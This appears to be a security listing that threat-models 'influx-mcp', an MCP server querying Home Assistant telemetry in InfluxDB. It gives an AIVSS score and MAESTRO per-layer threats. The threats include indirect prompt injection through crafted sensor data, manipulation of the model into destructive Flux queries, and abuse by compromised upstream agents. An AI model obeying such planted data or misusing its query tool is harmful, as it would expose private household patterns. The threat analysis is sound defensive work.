AgentReadyHomeAgent Listing

← influx-mcp

influx-mcp — agentic threat model

8.4AIVSS 8.4 · High

influx-mcp presents a high-risk profile due to its ability to execute arbitrary Flux queries over sensitive Home Assistant telemetry, making it highly vulnerable to prompt injection that could expose private household patterns.

OWASP AIVSS score rationale

AIVSS = (CVSS_Base + AARS) × Mitigation_Factor, where AARS = (10 − CVSS_Base) × (Factor_Sum / 10) × ThM
CVSS base 7.5AARS uplift 0.94Factor sum 3.6/10Threat ×1.05Mitigation ×1.0
Autonomy of Action
0.40
Goal-Driven Planning
0.30
Self-Modification
0.00
Dynamic Tool Use
0.80
Persistent Memory
0.20
Contextual Awareness
0.60
Dynamic Identity
0.10
Multi-Agent Interactions
0.30
Non-Determinism
0.50
Opacity & Reflexivity
0.40

Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.

MAESTRO 7-layer threat model

Per-layer threats for this agent. Layers tagged “not certain from listing” are general, caveated commentary where the public description didn’t pin that layer.

L1 · Foundation Models⚠ not certain from listing

Not certain from the listing — The underlying foundation model is not specified, but it is highly susceptible to indirect prompt injection via malicious sensor data stored in InfluxDB, which could reprogram the model's behavior during query execution.

L2 · Data Operations✓ mapped

The agent directly queries InfluxDB 2.x time-series databases. The primary threat is data exfiltration of sensitive IoT/Home Assistant telemetry and potential data poisoning if malicious actors can write crafted states to sensors that the agent later reads.

L3 · Agent Frameworks✓ mapped

The agent framework exposes highly sensitive tools, specifically arbitrary Flux query execution. This creates a severe tool misuse vulnerability where an LLM can be manipulated into executing destructive or unauthorized database queries.

L4 · Deployment & Infrastructure✓ mapped

The agent holds an InfluxDB access token. If the hosting environment (e.g., Home Assistant supervisor or local container) is compromised, this token can be exfiltrated, leading to direct database access outside the agent's boundaries.

L5 · Evaluation & Observability⚠ not certain from listing

Not certain from the listing — There is no mention of built-in guardrails, query validation, or logging mechanisms to detect and block malicious Flux queries or anomalous data exfiltration patterns.

L6 · Security & Compliance (cross-cutting)✓ mapped

The agent lacks fine-grained authorization controls; any agent or user with access to the MCP server inherits the full permissions of the underlying InfluxDB token, violating the principle of least privilege.

L7 · Agent Ecosystem✓ mapped

As an MCP server, this agent is designed to be called by other orchestrator agents. This introduces cascading risks where a compromised upstream agent can abuse influx-mcp to scan the entire local network's historical telemetry.

MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).